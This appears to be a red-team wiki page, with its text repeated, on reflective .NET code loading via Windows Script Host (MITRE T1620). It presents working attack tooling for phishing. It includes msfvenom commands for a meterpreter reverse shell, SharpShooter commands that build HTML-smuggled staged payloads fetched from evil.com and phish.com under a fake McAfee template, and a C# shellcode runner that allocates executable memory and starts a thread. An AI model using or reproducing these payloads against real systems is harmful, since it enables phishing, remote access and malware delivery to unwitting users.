Loading .NET Assembly from Windows Script Hosting

MITRE ATT&CK™ Reflective Code Loading - Technique T1620

Last updated 7 months ago

Was this helpful?

Loading .NET Assembly from Windows Script Hosting

MITRE ATT&CK™ Reflective Code Loading - Technique T1620

Theory

You can load and execute .NET (C#) assemblies directly into memory from a compiled binary using Jscript, VBScript, or VBA Mcros, by using the DotNetToJScript technique from James Forshaw.

As double-clicking .js or .vbs or other script files on Windows will by default execute them through the Windows-Based Script Host, this technique can efficiently be used for phishing and even phishing with HTML Smuggling.

Practice

SharpShooter (Python) can be used to creat payloads in a variety of formats, including HTA, JS, VBS and WSF. It leverages James Forshaw's DotNetToJavaScript tool to invoke methods from the SharpShooter DotNet serialised object.

SharpShooter supports both staged and stageless payload execution.

Stagless payload will embed the whole .NET in the generated file.
Staged payloads will attempt to retrieve a CSharp source code file that has been zipped and then base64 encoded using the chosen delivery technique (DNS or HTTP). The CSharp source code will be downloaded and compiled on the host using the .NET CodeDom compiler. Reflection is then subsequently used to execute the desired method from the source code. A summary of how SharpShooter operates during staging is shown in the diagram below:

However for both types of payload, we should first generate a shellcode.

# Generate a shellcode for stagless payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.121 LPORT=443 -f raw -o msf.raw

# Generate a shellcode for staged payloads
# The shellcode file should only contain the raw bytes, not the variable definition. For example byte[] buf = new byte[999] { 0x01, 0x02, 0x03 … would mean the shellcode file would contain just 0x01, 0x02, 0x03.
msfvenom -p windows/x64/exec CMD=calc.exe -f csharp > /tmp/raw.cs; cat /tmp/raw.cs |sed 's/byte\[\] buf = new byte\[[0-9]\+\] {//g' |sed 's/};//g' > msf.raw

When generating HTA payloads, we should always use 32-bit shellcodes due to mshta.exe being a 32-bit binary.

Stagless Payloads

We can now generate stageless payloads as follows.

# --payload:    Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
# --dotnetver:  Target .NET Version: 2 or 4
# --stageless:  Entire generated payload will be transferred at once (no HTML smuggling)

# Embedding a .NET assembly in JScript
sharpshooter --payload js --dotnetver 4 --stageless --rawscfile msf.raw --output evil

# Embedding a .NET assembly in VBScript
sharpshooter --payload vbs --dotnetver 4 --stageless --rawscfile msf.raw --output evil

Stagled Payloads

We can generate stageled payloads as follows.

# --payload:    Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
# --dotnetver:  Target .NET Version: 2 or 4
# --com:        COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
# --delivery:   Delivery method for the stage: web, dns, both
# --web:        URI for web delivery
# --shellcode:  Use built in shellcode execution
# --template:   HTTP Template for the HTTP generated file (for delievry)
# --smuggle:    Smuggle payload into generated HTTP

# HTTP Smuggling Delivery + Staged Payload to retreive the .NET to execute (in JScript)
sharpshooter --payload js --dotnetver 2 --shellcode --scfile msf.raw --output evil --delivery web --web http://www.evil.com/evil.payload --smuggle --template mcafee

For previous example, SharpShooter will have created 3 separate files in the output directory, evil.html, evil.js and evil.payload.

evil.js: JavaScript payload that the user will eventually execute. If you are using HTML smuggling, this file does not need to be sent to the user, it’s provided purely for information and debugging purposes.
evil.html: is the HTML file that we will ultimately coerce the user in to opening by whatever means. This file contains the encrypted copy of evil.js which is decrypted using JavaScript then served to the user using the navigator.mssaveBlob technique.
evil.payload: is the C Sharp source code that will be retrieved, compiled and executed on the target host. In this case, the file contains a harness that will execute the supplied shellcode. The source code file is zipped then base64 encoded. The file should be hosted at the URI http://www.evil.com/evil.payload

Alternatively, we can retreive a custom .NET from our staged payload:

# Custom .NET inside VBS
sharpshooter --dotnetver 4 --payload vbs --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee

DotNetToJScript is a tool created by James Forshaw that allows .NET (C#) assemblies to be executed within JavaScript or VBScript.

Prepare the .NET Assembly

First, you need to create or identify a .NET assembly (DLL or EXE) that contains the code you want to run. This assembly could perform any function, such as spawning a reverse shell, executing arbitrary code, or interacting with system resources.

In the example below, we create and compile our own C# code that can execute a supplied shellcode.

evil.cs

// Compile this code as a DLL for x64 arch using Visual Studio 
using System;
using System.Runtime.InteropServices;

[ComVisible(true)]
public class EvilLoader
{
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    public EvilLoader()
    {
        //msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
        byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8......};

        int size = buf.Length;
        IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
        Marshal.Copy(buf, 0, addr, size);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
    
    public void RunProcess(string path)
    {
        Process.Start(path);
    }
}

Execute DotNetToJScript

DotNetToJScript takes your compiled .NET assembly as input. The tool will embed this assembly into the output JScript or VBScript code.

When using custom .NET assembly like in our example (i.e not the "ExampleAssembmy" provided code) we should specify the assembly class name and entry function.

# -c:      Entry class name
# --lang:  Language to use (JScript, VBA, VBScript)
# --ver:   .NET version to use (None, v2, v4, Auto)

# Embedding a .NET assembly in JScript
.\DotNetToJScript.exe evil.dll -c EvilLoader --lang=Jscript --ver=v4 -o evil.js

# Embedding a .NET assembly in VBScript
.\DotNetToJScript.exe evil.dll -c EvilLoader --lang=VBScript --ver=v4 -o evil.js

# Embedding a .NET assembly in VBA
.\DotNetToJScript.exe evil.dll -c EvilLoader --lang=VBA --ver=v4 -o evil.js

Execute the Payload

Generated JScript or VBScript payload can be executed by double-clicking it or using Windows Script Host. Such

Resources

Last updated 7 months ago

Was this helpful?

Theory

You can load and execute .NET (C#) assemblies directly into memory from a compiled binary using Jscript, VBScript, or VBA Mcros, by using the DotNetToJScript technique from James Forshaw.

Practice

SharpShooter supports both staged and stageless payload execution.

Stagless payload will embed the whole .NET in the generated file.
Staged payloads will attempt to retrieve a CSharp source code file that has been zipped and then base64 encoded using the chosen delivery technique (DNS or HTTP). The CSharp source code will be downloaded and compiled on the host using the .NET CodeDom compiler. Reflection is then subsequently used to execute the desired method from the source code. A summary of how SharpShooter operates during staging is shown in the diagram below:

However for both types of payload, we should first generate a shellcode.

# Generate a shellcode for stagless payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.121 LPORT=443 -f raw -o msf.raw

# Generate a shellcode for staged payloads
# The shellcode file should only contain the raw bytes, not the variable definition. For example byte[] buf = new byte[999] { 0x01, 0x02, 0x03 … would mean the shellcode file would contain just 0x01, 0x02, 0x03.
msfvenom -p windows/x64/exec CMD=calc.exe -f csharp > /tmp/raw.cs; cat /tmp/raw.cs |sed 's/byte\[\] buf = new byte\[[0-9]\+\] {//g' |sed 's/};//g' > msf.raw

When generating HTA payloads, we should always use 32-bit shellcodes due to mshta.exe being a 32-bit binary.

Stagless Payloads

We can now generate stageless payloads as follows.

# --payload:    Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
# --dotnetver:  Target .NET Version: 2 or 4
# --stageless:  Entire generated payload will be transferred at once (no HTML smuggling)

# Embedding a .NET assembly in JScript
sharpshooter --payload js --dotnetver 4 --stageless --rawscfile msf.raw --output evil

# Embedding a .NET assembly in VBScript
sharpshooter --payload vbs --dotnetver 4 --stageless --rawscfile msf.raw --output evil

Stagled Payloads

We can generate stageled payloads as follows.

# --payload:    Payload type: hta, js, jse, vbe, vbs, wsf, macro, slk
# --dotnetver:  Target .NET Version: 2 or 4
# --com:        COM Staging Technique: outlook, shellbrowserwin, wmi, wscript, xslremote
# --delivery:   Delivery method for the stage: web, dns, both
# --web:        URI for web delivery
# --shellcode:  Use built in shellcode execution
# --template:   HTTP Template for the HTTP generated file (for delievry)
# --smuggle:    Smuggle payload into generated HTTP

# HTTP Smuggling Delivery + Staged Payload to retreive the .NET to execute (in JScript)
sharpshooter --payload js --dotnetver 2 --shellcode --scfile msf.raw --output evil --delivery web --web http://www.evil.com/evil.payload --smuggle --template mcafee

For previous example, SharpShooter will have created 3 separate files in the output directory, evil.html, evil.js and evil.payload.

evil.js: JavaScript payload that the user will eventually execute. If you are using HTML smuggling, this file does not need to be sent to the user, it’s provided purely for information and debugging purposes.
evil.html: is the HTML file that we will ultimately coerce the user in to opening by whatever means. This file contains the encrypted copy of evil.js which is decrypted using JavaScript then served to the user using the navigator.mssaveBlob technique.
evil.payload: is the C Sharp source code that will be retrieved, compiled and executed on the target host. In this case, the file contains a harness that will execute the supplied shellcode. The source code file is zipped then base64 encoded. The file should be hosted at the URI http://www.evil.com/evil.payload

Alternatively, we can retreive a custom .NET from our staged payload:

# Custom .NET inside VBS
sharpshooter --dotnetver 4 --payload vbs --sandbox 2,3,4,5 --delivery web --refs mscorlib.dll,System.Windows.Forms.dll --namespace MDSec.SharpShooter --entrypoint Main --web http://www.phish.com/implant.payload --output malicious --smuggle --template mcafee

DotNetToJScript is a tool created by James Forshaw that allows .NET (C#) assemblies to be executed within JavaScript or VBScript.

Prepare the .NET Assembly

In the example below, we create and compile our own C# code that can execute a supplied shellcode.

evil.cs

// Compile this code as a DLL for x64 arch using Visual Studio 
using System;
using System.Runtime.InteropServices;

[ComVisible(true)]
public class EvilLoader
{
    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
    static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
    [DllImport("kernel32.dll")]
    static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
    [DllImport("kernel32.dll")]
    static extern UInt32 WaitForSingleObject(IntPtr hHandle, UInt32 dwMilliseconds);

    public EvilLoader()
    {
        //msfvenom -p windows/x64/exec CMD=calc.exe -f csharp
        byte[] buf = new byte[276] {0xfc,0x48,0x83,0xe4,0xf0,0xe8......};

        int size = buf.Length;
        IntPtr addr = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40);
        Marshal.Copy(buf, 0, addr, size);
        IntPtr hThread = CreateThread(IntPtr.Zero, 0, addr, IntPtr.Zero, 0, IntPtr.Zero);
        WaitForSingleObject(hThread, 0xFFFFFFFF);
    }
    
    public void RunProcess(string path)
    {
        Process.Start(path);
    }
}

Execute DotNetToJScript

DotNetToJScript takes your compiled .NET assembly as input. The tool will embed this assembly into the output JScript or VBScript code.

When using custom .NET assembly like in our example (i.e not the "ExampleAssembmy" provided code) we should specify the assembly class name and entry function.

# -c:      Entry class name
# --lang:  Language to use (JScript, VBA, VBScript)
# --ver:   .NET version to use (None, v2, v4, Auto)

# Embedding a .NET assembly in JScript
.\DotNetToJScript.exe evil.dll -c EvilLoader --lang=Jscript --ver=v4 -o evil.js

# Embedding a .NET assembly in VBScript
.\DotNetToJScript.exe evil.dll -c EvilLoader --lang=VBScript --ver=v4 -o evil.js

# Embedding a .NET assembly in VBA
.\DotNetToJScript.exe evil.dll -c EvilLoader --lang=VBA --ver=v4 -o evil.js

Execute the Payload

Generated JScript or VBScript payload can be executed by double-clicking it or using Windows Script Host. Such

Resources

Payload Generation using SharpShooter - MDSecMDSec

Shellcode Runners | Pentester's Promiscuous Notebook

Executing C# Assemblies from Jscript and wscript with DotNetToJscriptRed Teaming Experiments